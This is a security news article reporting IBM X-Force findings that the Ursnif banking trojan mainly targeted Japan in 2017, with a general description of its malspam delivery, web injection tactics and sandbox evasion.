The Ursnif banking malware(or Gozi) has set Japan as their primary target according to data released by IBM X-Force.Ursnif was most active malware code in the financial sector in 2016 and has maintained its dominance through 2017, said in the report relea
[lgc_column grid="100" tablet_grid="100" mobile_grid="100" last="false" style="background-color: #dcdcdc;] Capsule :
News in Details:-The Ursnif banking malware(or Gozi) has set Japan as their primary target according to data released by IBM X-Force.Ursnif was most active malware code in the financial sector in 2016 and has maintained its dominance through 2017, said in the report released by X-Force.The banking trojan was seen targeting North America, Europe, Australia along with Japan but the data says that Japanese banks were one of the popular targets of Ursnif in 2017.The active variant of Ursnif in Japan was seen targeting user credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites in addition to banking credentials.According to X-Force report, the attack tactics used against Japanese users were data grabbing from a secure session, web injection attacks and page redirection also was seen in some cases.- Japan has become Ursnif banking malware’s primary target.
- It targets local webmail, cloud storage, cryptocurrency exchange platforms & e-commerce sites.
- The attack tactics used were data grabbing, web injection attacks & page redirection.
- Ursnif uses macro evasion techniques that launches PowerShell only after the user closes the malicious file and this helps malware to evade sandbox detection - by Limor Kessem, executive security advisor for IBM.
You may be interested in reading:A Simple ATM Malware ATMii Capable of Dispensing Cash by Hijacking Legitimate ProcessUrsnif banking malware usually uses malspam and exploit kits for delivering payloads and in recent campaigns against Japanese banks it used malspam as the delivery method.An email which pretends to be from some financial service includes fake attachments or users will receive an email with an HTML link which when clicked will download a zip file containing a javascript.Javascript which is capable of launching a PowerShell script that downloads the payload from a remote server.Limor Kessem, executive security advisor for IBM said that they found the most recent variant of Ursnif which uses macro evasion techniques that launches PowerShell only after the user closes the malicious file and this helps malware to evade sandbox detection.“X-Force data revealed that campaign email spikes take place in cyclical weekly rounds, usually peaking on Tuesday evenings. Attempted infections peak on Thursdays and Fridays and are relatively low during the weekend and early weekdays,” said Kessem.The below figure shows the list of most seen banking malware families in 2017 per attack volume:
About the Author
[lgc_column grid="15" tablet_grid="25" mobile_grid="25" last="false"]
[/lgc_column][lgc_column grid="85" tablet_grid="75" mobile_grid="75" last="true" style="background-color: #dcdcdc;"]Ashique is a self motivated and passionate security analyst with a good knowledge in computer networking, security analysis, vulnerability assessment and penetration testing. [/lgc_column]
[/lgc_column][lgc_column grid="85" tablet_grid="75" mobile_grid="75" last="true" style="background-color: #dcdcdc;"]Ashique is a self motivated and passionate security analyst with a good knowledge in computer networking, security analysis, vulnerability assessment and penetration testing. [/lgc_column]